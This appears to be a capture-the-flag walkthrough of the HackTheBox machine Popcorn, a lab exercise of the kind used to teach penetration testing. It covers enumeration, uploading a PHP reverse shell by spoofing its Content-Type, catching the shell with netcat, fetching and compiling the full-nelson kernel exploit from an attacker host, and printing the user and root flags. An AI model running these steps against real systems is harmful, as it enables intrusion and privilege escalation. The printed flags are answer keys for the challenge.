HackTheBox Popcorn
Writeup for HackTheBox Popcorn
Machine Synopsis
Popcorn, while not overly complicated, contains quite a bit of content and it can be difficult for some users to locate the proper attack vector at first. This machine mainly focuses on different methods of web exploitation. (Source)
Enumeration
1
2
3
4
5
6
7
8
9
10
$ nmap -sC -sV -A 10.10.10.6
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
Here is the default webpage.
Running gobuster on the webpage results in an interesting directory called /torrent.
1
2
3
4
5
6
7
$ gobuster dir -u http://10.10.10.6 -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
...
/index (Status: 200) [Size: 177]
/test (Status: 200) [Size: 47032]
/torrent (Status: 301) [Size: 310] [--> http://10.10.10.6/torrent/]
/rename (Status: 301) [Size: 309] [--> http://10.10.10.6/rename/]
...
There is an option to sign up for an account.
Exploitation
Upon logging into the newly created account, it was observed that there is an upload page.
It seems like we can upload a torrent file here, but can we uploading anything else? Uploading a PHP reverse shell returns an error “This is not a valid torrent file”.
Let’s upload a proper torrent file instead.
It seems that after uploading the torrent, we can edit the torrent!
One of the features allow us to change the screenshot. Perhaps we can do something malicious here?
This time, trying to upload a PHP reverse shell resulted in a “invalid file” error. What if we intercepted the request and changed the Content-Type: application/x-php to Content-Type: image/png?
1
2
3
4
5
6
7
8
9
10
11
12
13
HTTP/1.1 200 OK
Date: Wed, 20 Apr 2022 06:48:54 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 138
Connection: close
Content-Type: text/html
Upload: exploit.php<br />Type: image/png<br />Size: 5.3623046875 Kb<br />Upload Completed. <br />Please refresh to see the new screenshot.
Great! It works. However, where is the file being uploaded to? RunningGobuster on http://10.10.10.6/torrent/ showed that there is an /upload directory.
Execute the reverse shell by clicking on the uploaded file.
1
2
3
4
5
6
7
8
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.6] 34129
...
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -r
2.6.31-14-generic-pae
Privilege Escalation
Executed Linux Exploit Suggester to find out some possible vulnerabilities.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ wget http://10.10.14.9:8000/les.sh
$ chmod +x les.sh
$ ./les.sh
...
Possible Exploits:
cat: write error: Broken pipe
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c
Exposure: highly probable
Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
Download URL: http://vulnfactory.org/exploits/full-nelson.c
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
...
It seems like the machine is highly likely to be vulnerable to full-nelson (local privilege escalation) exploit!
1
2
3
4
5
6
7
8
9
10
11
12
$ wget http://10.10.14.9:8000/full-nelson.c
$ gcc full-nelson.c -o full-nelson
$ chmod +x full-nelson
$ ./full-nelson
id
uid=0(root) gid=0(root)
cd /home/george
cat user.txt
c1b9db61d386e3f830c010480ab54077
cd /root
cat root.txt
c5ba80b7f9f478d28cbbf7c59df47478